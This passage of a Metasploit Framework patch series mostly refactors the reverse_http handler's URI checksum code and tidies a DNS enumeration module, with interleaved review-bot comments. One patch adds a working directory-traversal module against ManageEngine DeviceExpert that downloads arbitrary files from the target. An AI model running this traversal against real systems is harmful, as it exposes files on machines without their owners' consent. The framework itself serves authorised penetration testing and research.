"jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. From 899c6529c3a9fa6a9aa3997d0e37a29817fe8214 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 12:22:19 -0500 Subject: [PATCH 17/46] Revert "Precalculate some uri strings in case the 1000-round generation fails" This reverts commit 7161a548f4259032f5cef8d97f38915aaa6344db. Prepping for a more sane solution that doesn't change the URI sizes and succeeds without fallingback to a pre-generated list. --- lib/msf/core/handler/reverse_http.rb | 15 +++------------ lib/msf/core/handler/reverse_https.rb | 5 ----- 2 files changed, 3 insertions(+), 17 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index fe1a7d78a9..dc241353cc 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb 
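Review bot: URI_CHECKSUM_PRECALC is added to reverse_https.rb here, but the diffstat shows only these five insertions for that file, so as far as the patch shows nothing in ReverseHttps reads the constant. The fallback `return URI_CHECKSUM_PRECALC[sum]` is wired up only in reverse_http.rb. Either add the same fallback to this file's generate_uri_checksum or drop the copy. A single frozen definition in a shared module, instead of two identical literals, would also stop the lists drifting apart, and the comment's "checkums" should read "checksums".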
@@ -36,12 +36,7 @@ module ReverseHttp URI_CHECKSUM_INITW = 92 URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", 
"LITku", "AZIxn", "bVwPL", "jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - + # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. @@ -70,15 +65,11 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - - # Spend up to 1000 rounds to generate a random URI 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(5) + uri = Rex::Text.rand_text_alphanumeric(4) return uri if Rex::Text.checksum8(uri) == sum end - - # Otherwise return one of the pre-calculated strings - return URI_CHECKSUM_PRECALC[sum] + raise RuntimeError, "Unable to generate a string with checksum #{sum}" end # diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index b873a279d3..0867ef01dc 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb 
@@ -37,11 +37,6 @@ module ReverseHttps URI_CHECKSUM_INITJ = 88 URI_CHECKSUM_CONN = 98 - # - # Precalculated checkums as fallback - # - URI_CHECKSUM_PRECALC = ["Zjjaq", "pIlfv", "UvoxP", "sqnx9", "zvoVO", "Pajqy", "7ziuw", "vecYp", "yfHsn", "YLzzp", "cEzvr", "abmri", "9tvwr", "vTarp", "ocrgc", "mZcyl", "xfcje", "nihqa", "40F17", "zzTWt", "E3192", "wygVh", "pbqij", "rxdVs", "ajtsf", "wvuOh", "hwRwr", "pUots", "rvzoK", "vUwby", "tLzyk", "zxbuV", "niaoy", "ukxtU", "vznoU", "zuxyC", "ymvag", "Jxtxw", "404KC", "DE563", "0A7G9", "yorYv", "zzuqP", "czhwo", "949N8", "a1560", "5A2S3", "Q652A", "KR201", "uixtg", "U0K02", "4EO56", "H88H4", "5M8E6", "zudkx", "ywlsh", "luqmy", "09S4I", "L0GG0", "V916E", "KFI11", "A4BN8", "C3E2Q", "UN804", "E75HG", "622eB", "1OZ71", "kynyx", "0RE7F", "F8CR2", "1Q2EM", "txzjw", "5KD1S", "GLR40", "11BbD", "MR8B2", "X4V55", "W994P", "13d2T", "6J4AZ", "HD2EM", "766bL", "8S4MF", "MBX39", "UJI57", "eIA51", "9CZN2", "WH6AA", "a6BF9", "8B1Gg", "J2N6Z", "144Kw", "7E37v", "9I7RR", "PE6MF", "K0c4M", "LR3IF", "38p3S", "39ab3", "O0dO1", "k8H8A", "0Fz3B", "o1PE1", "h7OI0", "C1COb", "bMC6A", "8fU4C", "3IMSO", "8DbFH", "2YfG5", "bEQ1E", "MU6NI", "UCENE", "WBc0E", "T1ATX", "tBL0A", "UGPV2", "j3CLI", "7FXp1", "yN07I", "YE6k9", "KTMHE", "a7VBJ", "0Uq3R", "70Ebn", "H2PqB", "83edJ", "0w5q2", "72djI", "wA5CQ", "KF0Ix", "i7AZH", "M9tU5", "Hs3RE", "F9m1i", "7ecBF", "zS31W", "lUe21", "IvCS5", "j97nC", "CNtR5", "1g8gV", "7KwNG", "DB7hj", "ORFr7", "GCnUD", "K58jp", "5lKo8", "GPIdP", "oMIFJ", "2xYb1", "LQQPY", "FGQlN", "l5COf", "dA3Tn", "v9RWC", "VuAGI", "3vIr9", "aO3zA", "CIfx5", "Gk6Uc", "pxL94", "rKYJB", "TXAFp", "XEOGq", "aBOiJ", "qp6EJ", "YGbq4", "dR8Rh", "g0SVi", "iMr6L", "HMaIl", "yOY1Z", "UXr5Y", "PJdz6", "OQdt7", "EmZ1s", "aLIVe", "cIeo2", "mTTNP", "eVKy5", "hf5Co", "gFHzG", "VhTWN", "DvAWf", "RgFJp", "MoaXE", "Mrq4W", "hRQAp", "hAzYA", "oOSWV", "UKMme", "oP0Zw", "Mxd6b", "RsRCh", "dlk7Q", "YU6zf", "VPDjq", "ygERO", "dZZcL", "dq5qM", "LITku", "AZIxn", "bVwPL", 
"jGvZK", "XayKP", "rTYVY", "Vo2ph", "dwJYR", "rLTlS", "BmsfJ", "Dyv1o", "j9Hvs", "w0wVa", "iDnBy", "uKEgk", "uosI8", "2yjuO", "HiOue", "qYi4t", "7nalj", "ENekz", "rxca0", "rrePF", "cXmtD", "Xlr2y", "S7uxk", "wJqaP", "KmYyZ", "cPryG", "kYcwH", "FtDut", "xm1em", "IaymY", "fr6ew", "ixDSs", "YigPs", "PqwBs", "y2rkf", "vwaTM", "aq7wp", "fzc4z", "AyzmQ", "epJbr", "culLd", "CVtnz", "tPjPx", "nfry8", "Nkpif", "8kuzg", "zXvz8", "oVQly", "1vpnw", "jqaYh", "2tztj", "4tslx"] - # # Map "random" URIs to static strings, allowing us to randomize # the URI sent in the first request. From 5cacf5f8f652b91f952d332d84ad00229e9b2848 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 12:28:21 -0500 Subject: [PATCH 18/46] A still cleaner checksummed URI generator Now with http and https support. --- lib/msf/core/handler/reverse_http.rb | 6 +++--- lib/msf/core/handler/reverse_https.rb | 5 +---- 2 files changed, 4 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/handler/reverse_http.rb b/lib/msf/core/handler/reverse_http.rb index dc241353cc..148e78dd46 100644 --- a/lib/msf/core/handler/reverse_http.rb +++ b/lib/msf/core/handler/reverse_http.rb @@ -65,9 +65,9 @@ module ReverseHttp # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - 0.upto(1000) do - uri = Rex::Text.rand_text_alphanumeric(4) - return uri if Rex::Text.checksum8(uri) == sum + uri = Rex::Text.rand_text_alphanumeric(3) + ("a".."z").sort_by {rand}.each do |x| + return(uri + x) if Rex::Text.checksum8(uri + x) end raise RuntimeError, "Unable to generate a string with checksum #{sum}" end diff --git a/lib/msf/core/handler/reverse_https.rb b/lib/msf/core/handler/reverse_https.rb index 0867ef01dc..da94a3f670 100644 --- a/lib/msf/core/handler/reverse_https.rb +++ b/lib/msf/core/handler/reverse_https.rb 
@@ -66,13 +66,10 @@ module ReverseHttps # Create a URI that matches a given checksum # def generate_uri_checksum(sum) - urix = nil uri = Rex::Text.rand_text_alphanumeric(3) ("a".."z").sort_by {rand}.each do |x| - urix = (uri + x) if Rex::Text.checksum8(uri + x) - break if urix + return(uri + x) if Rex::Text.checksum8(uri + x) end - return urix if urix raise RuntimeError, "Unable to generate a string with checksum #{sum}" end From 19fc8d9883f69aa7bd55bc96a620c5cc1d7caed8 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 26 Mar 2012 12:42:24 -0500 Subject: [PATCH 19/46] Add OSVDB-80262 --- .../scanner/http/manageengine_traversal.rb | 81 +++++++++++++++++++ 1 file changed, 81 insertions(+) create mode 100644 modules/auxiliary/scanner/http/manageengine_traversal.rb diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_traversal.rb new file mode 100644 index 0000000000..c5c099cd56 --- /dev/null +++ b/modules/auxiliary/scanner/http/manageengine_traversal.rb 
@@ -0,0 +1,81 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Auxiliary::Scanner + include Msf::Auxiliary::Report + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'ManageEngine DeviceExpert 5.6 ScheduleResultViewer FileName Traversal', + 'Description' => %q{ + This module exploits a directory traversal vulnerability found in ManageEngine + DeviceExpert's ScheduleResultViewer Servlet. This is done by using + "..\..\..\..\..\..\..\..\..\..\" in the path in order to retrieve a file on a + vulnerable machine. Please note that the SSL option is required in order to send + HTTP requests. + }, + 'References' => + [ + [ 'OSVDB', '80262'], + [ 'URL', 'http://retrogod.altervista.org/9sg_me_adv.htm' ] + ], + 'Author' => + [ + 'rgod', #Discovery + 'sinn3r' + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "Mar 18 2012" + )) + + register_options( + [ + Opt::RPORT(6060), + OptBool.new('SSL', [true, 'Use SSL', true]), + OptString.new('FILEPATH', [true, 'The name of the file to download', 'boot.ini']) + ], self.class) + + deregister_options('RHOST') + end + + def run_host(ip) + traverse = "..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\" + filename = datastore['FILEPATH'] + + res = send_request_raw({ + 'uri' => "/scheduleresult.de/?FileName=#{traverse}#{filename}", + 'method' => 'GET' + }, 25) + + if res + print_status("#{ip}:#{rport} returns: #{res.code.to_s}") + else + print_error("Unable to communicate with #{ip}:#{rport}") + return + end + + if res.body.empty? 
+ print_error("#{ip}:#{rport} - no file downloaded (empty)") + else + fname = File.basename(datastore['FILEPATH']) + path = store_loot( + 'manageengine.http', + 'application/octet-stream', + ip, + res.body, + fname) + + print_status("#{ip}:#{rport} - File saved in: #{path}") + end + + end +end \ No newline at end of file From 79d74b87687ea44fdc4cb5c88c1f89679c36cda2 Mon Sep 17 00:00:00 2001 From: sinn3r Date: Mon, 26 Mar 2012 12:58:18 -0500 Subject: [PATCH 20/46] ADD OSVDB-80262 --- modules/auxiliary/scanner/http/manageengine_traversal.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/manageengine_traversal.rb b/modules/auxiliary/scanner/http/manageengine_traversal.rb index c5c099cd56..dad6dcb052 100644 --- a/modules/auxiliary/scanner/http/manageengine_traversal.rb +++ b/modules/auxiliary/scanner/http/manageengine_traversal.rb @@ -76,6 +76,6 @@ class Metasploit3 < Msf::Auxiliary print_status("#{ip}:#{rport} - File saved in: #{path}") end - end + end \ No newline at end of file From dc6f76eb207fff134fd3778bbf5a9459e0c578a7 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:08:39 -0500 Subject: [PATCH 21/46] Style fixes for enum_dns.rb * Use a dotted.notation for note types * Changed title to something more descriptive * Expanded description * Other trivial changes --- modules/auxiliary/gather/enum_dns.rb | 61 +++++++++++++++------------- 1 file changed, 32 insertions(+), 29 deletions(-) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index d33f3fe9e9..b73e5b0532 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb 
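Review bot: In run_host the `if res.body.empty?` test is the only gate before `store_loot`, so any non-empty response, including an error page returned with a 4xx or 5xx status, is saved and reported as a downloaded file. Check the status first, e.g. `if res.code != 200 or res.body.empty?`, so that the loot store and any report built from it do not record false positives. The `.to_s` in `#{res.code.to_s}` is redundant inside interpolation, and the new file has no trailing newline.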
@@ -17,10 +17,13 @@ class Metasploit3 < Msf::Auxiliary def initialize(info = {}) super(update_info(info, - 'Name' => 'DNS Enumeration Module', + 'Name' => 'DNS Record Scanner and Enumerator ', 'Description' => %q{ - This module can be used to enumerate various types of information - about a domain from a specific DNS server. + This module can be used to enumerate various types of information + about a domain from a specific DNS server by performing various + DNS queries such as zone transfers, reverse lookups, SRV record + bruteforcing, and other techniques. + }, 'Author' => [ 'Carlos Perez ' ], 'License' => MSF_LICENSE, 
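Review bot: The new 'Name' value ends with a stray space, `'DNS Record Scanner and Enumerator '`, which will presumably show up wherever the module name is displayed or compared. It should be `'DNS Record Scanner and Enumerator'`. The empty line added before the closing `},` of 'Description' is also unnecessary inside the `%q{}` block.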
@@ -35,17 +38,17 @@ class Metasploit3 < Msf::Auxiliary register_options( [ OptString.new('DOMAIN', [ true, "The target domain name"]), - OptBool.new('ENUM_AXFR', [ true, 'Initiate a zone Transfer against each NS record', true]), - OptBool.new('ENUM_TLD', [ true, 'Perform a top-level domain expansion by replacing TLD and testing against IANA TLD list', false]), + OptBool.new('ENUM_AXFR', [ true, 'Initiate a zone transfer against each NS record', true]), + OptBool.new('ENUM_TLD', [ true, 'Perform a top-level domain expansion by replacing the TLD and testing against IANA TLD list', false]), OptBool.new('ENUM_STD', [ true, 'Enumerate standard record types (A,MX,NS,TXT and SOA)', true]), - OptBool.new('ENUM_BRT', [ true, 'Brute force subdomains and hostnames via wordlist', false]), + OptBool.new('ENUM_BRT', [ true, 'Brute force subdomains and hostnames via the supplied wordlist', false]), OptBool.new('ENUM_IP6', [ true, 'Brute force hosts with IPv6 AAAA records',false]), OptBool.new('ENUM_RVL', [ true, 'Reverse lookup a range of IP addresses', false]), OptBool.new('ENUM_SRV', [ true, 'Enumerate the most common SRV records', true]), - OptPath.new('WORDLIST', [ false, "Wordlist file for domain name brute force.", File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), - OptAddress.new('NS', [ false, "Specify the nameserver to use for queries, otherwise use the system DNS" ]), + OptPath.new('WORDLIST', [ false, "Wordlist for domain name bruteforcing", ::File.join(Msf::Config.install_root, "data", "wordlists", "namelist.txt")]), + OptAddress.new('NS', [ false, "Specify the nameserver to use for queries (default is system DNS)" ]), OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]), - OptBool.new('STOP_WLDCRD', [ true, 'Stops Brute Force Enumeration if wildcard resolution is detected', false]) + OptBool.new('STOP_WLDCRD', [ true, 'Stops bruteforce enumeration if wildcard resolution is detected', false]) ], self.class) 
register_advanced_options( @@ -101,7 +104,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{target},A") end end @@ -116,7 +119,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{ip.address.to_s},#{rr.mname},SOA") end end @@ -134,7 +137,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{ip.address.to_s},#{rr.nsdname},NS") end end @@ -148,7 +151,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.exchange},MX") end end @@ -160,7 +163,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.txt},TXT") end end @@ -172,7 +175,6 @@ class Metasploit3 < Msf::Auxiliary if not nssrv.nil? @res.nameserver=(nssrv) end - print_status("Performing Top Level Domain Expansion") i, a = 0, [] tlds = [ "com", "org", "net", "edu", "mil", "gov", "uk", "af", "al", "dz", @@ -199,6 +201,7 @@ class Metasploit3 < Msf::Auxiliary "ug", "ua", "ae", "gb", "us", "um", "uy", "uz", "vu", "ve", "vn", "vg", "vi", "wf", "eh", "ye", "yu", "za", "zr", "zm", "zw", "int", "gs", "info", "biz", "su", "name", "coop", "aero" ] + print_status("Performing Top Level Domain expansion using #{tlds.size} TLDs") tlds.each do |tld| query1 = @res.search("#{target}.#{tld}") @@ -209,7 +212,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53, - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{target}.#{tld},A") if rr.class == Net::DNS::RR::A end end 
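Review bot: The `:type` literal changed here from `'DNS_ENUM'` to `'dns.enum'` is repeated verbatim in every `report_note` call this patch touches (this hunk, the remaining hunks in the record-lookup and brute-force methods, and each `when` branch of the zone-transfer code), so the next rename is again a twenty-line edit with room for one call site to be missed. A single constant near the top of the class, e.g. `NOTE_TYPE = 'dns.enum'.freeze`, with `:type => NOTE_TYPE` at each call would keep them in step. Notes already stored under the old type will presumably not match a lookup on the new one; if anything filters on the type, that deserves a line in the commit message. The enclosing methods start and end outside these hunks.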
@@ -235,7 +238,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{line.chomp}.#{target},A") next unless rr.class == Net::DNS::RR::CNAME end @@ -263,7 +266,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{line.chomp}.#{target},AAAA") next unless rr.class == Net::DNS::RR::CNAME end @@ -297,7 +300,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{addresstp},#{tip},A") end rescue ::Interrupt @@ -370,7 +373,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "Zone Transfer Successful") #Prints each record according to its type zone.answer.each do |rr| @@ -381,7 +384,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s},#{rr.name},A") when "SOA" print_status("Name: #{rr.mname} Record: SOA") @@ -389,7 +392,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.name},SOA") when "MX" print_status("Name: #{rr.exchange} Preference: #{rr.preference} Record: MX") @@ -397,7 +400,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.exchange},MX") when "CNAME" print_status("Name: #{rr.cname} Record: CNAME") @@ -405,7 +408,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.cname},CNAME") when "HINFO" print_status("CPU: #{rr.cpu} OS: #{rr.os} Record: HINFO") 
@@ -413,7 +416,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "CPU:#{rr.cpu},OS:#{rr.os},HINFO") when "AAAA" print_status("IPv6 Address: #{rr.address} Record: AAAA") @@ -421,7 +424,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.address.to_s}, AAAA") when "NS" print_status("Name: #{rr.nsdname} Record: NS") @@ -429,7 +432,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.nsdname},NS") when "TXT" print_status("Text: #{rr.txt} Record: TXT") @@ -437,7 +440,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.txt},TXT") when "SRV" print_status("Host: #{rr.host} Port: #{rr.port} Priority: #{rr.priority} Record: SRV") @@ -445,7 +448,7 @@ class Metasploit3 < Msf::Auxiliary :proto => 'udp', :sname => 'dns', :port => 53 , - :type => 'DNS_ENUM', + :type => 'dns.enum', :data => "#{rr.host},#{rr.port},#{rr.priority},SRV") end end From 14b45f9fb129bbe246c6d4c7ea365eb9261958db Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 26 Mar 2012 16:14:04 -0500 Subject: [PATCH 22/46] More fixes to enum_dns.rb * Should use 'and', not & (bitwise AND) * Made capitalization sane for Anglophones. See: http://owl.english.purdue.edu/owl/resource/592/1/ --- modules/auxiliary/gather/enum_dns.rb | 46 ++++++++++++++-------------- 1 file changed, 23 insertions(+), 23 deletions(-) diff --git a/modules/auxiliary/gather/enum_dns.rb b/modules/auxiliary/gather/enum_dns.rb index b73e5b0532..78e5063977 100644 --- a/modules/auxiliary/gather/enum_dns.rb +++ b/modules/auxiliary/gather/enum_dns.rb 
@@ -83,7 +83,7 @@ class Metasploit3 < Msf::Auxiliary rendsub = rand(10000).to_s query = @res.query("#{rendsub}.#{target}", "A") if query.answer.length != 0 - print_status("This Domain has Wildcards Enabled!!") + print_status("This domain has wildcards enabled!!") query.answer.each do |rr| print_status("Wildcard IP for #{rendsub}.#{target} is: #{rr.address.to_s}") if rr.class != Net::DNS::RR::CNAME end @@ -94,12 +94,12 @@ class Metasploit3 < Msf::Auxiliary end #--------------------------------------------------------------------------------- def genrcd(target) - print_status("Retrieving General DNS Records") + print_status("Retrieving general DNS records") query = @res.search(target) if (query) query.answer.each do |rr| next unless rr.class == Net::DNS::RR::A - print_status("Domain: #{target} IP Address: #{rr.address} Record: A ") + print_status("Domain: #{target} IP address: #{rr.address} Record: A ") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Auxiliary query1 = @res.search(rr.mname) if (query1) query1.answer.each do |ip| - print_status("Start of Authority: #{rr.mname} IP Address: #{ip.address} Record: SOA") + print_status("Start of Authority: #{rr.mname} IP address: #{ip.address} Record: SOA") report_note(:host => ip.address.to_s, :proto => 'udp', :sname => 'dns', @@ -132,7 +132,7 @@ class Metasploit3 < Msf::Auxiliary if (query1) query1.answer.each do |ip| next unless ip.class == Net::DNS::RR::A - print_status("Name Server: #{rr.nsdname} IP Address: #{ip.address} Record: NS") + print_status("Name Server: #{rr.nsdname} IP address: #{ip.address} Record: NS") report_note(:host => ip.address.to_s, :proto => 'udp', :sname => 'dns', 
@@ -207,7 +207,7 @@ class Metasploit3 < Msf::Auxiliary query1 = @res.search("#{target}.#{tld}") if (query1) query1.answer.each do |rr| - print_status("Domain: #{target}.#{tld} Name: #{rr.name} IP Address: #{rr.address} Record: A ") if rr.class == Net::DNS::RR::A + print_status("Domain: #{target}.#{tld} Name: #{rr.name} IP address: #{rr.address} Record: A ") if rr.class == Net::DNS::RR::A report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -222,7 +222,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- def dnsbrute(target, wordlist, nssrv) - print_status("Running Brute Force against Domain #{target}") + print_status("Running bruteforce against domain #{target}") arr = [] i, a = 0, [] ::File.open(wordlist, "rb").each_line do |line| @@ -233,7 +233,7 @@ class Metasploit3 < Msf::Auxiliary if (query1) query1.answer.each do |rr| if rr.class == Net::DNS::RR::A - print_status("Host Name: #{line.chomp}.#{target} IP Address: #{rr.address.to_s}") + print_status("Hostname: #{line.chomp}.#{target} IP address: #{rr.address.to_s}") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', @@ -249,7 +249,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- def bruteipv6(target, wordlist, nssrv) - print_status("Brute Forcing IPv6 addresses against Domain #{target}") + print_status("Bruteforcing IPv6 addresses against domain #{target}") arr = [] i, a = 0, [] arr = IO.readlines(wordlist) @@ -261,7 +261,7 @@ class Metasploit3 < Msf::Auxiliary if (query1) query1.answer.each do |rr| if rr.class == Net::DNS::RR::AAAA - print_status("Host Name: #{line.chomp}.#{target} IPv6 Address: #{rr.address.to_s}") + print_status("Hostname: #{line.chomp}.#{target} IPv6 Address: #{rr.address.to_s}") report_note(:host => rr.address.to_s, :proto => 'udp', :sname => 'dns', 
@@ -280,7 +280,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- def reverselkp(iprange,nssrv) - print_status("Running Reverse Lookup against ip range #{iprange}") + print_status("Running reverse lookup against IP range #{iprange}") if not nssrv.nil? @res.nameserver = (nssrv) end @@ -295,7 +295,7 @@ class Metasploit3 < Msf::Auxiliary begin query = @res.query(tip) query.each_ptr do |addresstp| - print_status("Host Name: #{addresstp} IP Address: #{tip.to_s}") + print_status("Hostname: #{addresstp} IP address: #{tip.to_s}") report_note(:host => tip, :proto => 'udp', :sname => 'dns', @@ -323,7 +323,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- #SRV Record Enumeration def srvqry(dom,nssrv) - print_status("Enumerating SRV Records for #{dom}") + print_status("Enumerating SRV records for #{dom}") i, a = 0, [] #Most common SRV Records srvrcd = [ @@ -350,7 +350,7 @@ class Metasploit3 < Msf::Auxiliary #------------------------------------------------------------------------------- #For Performing 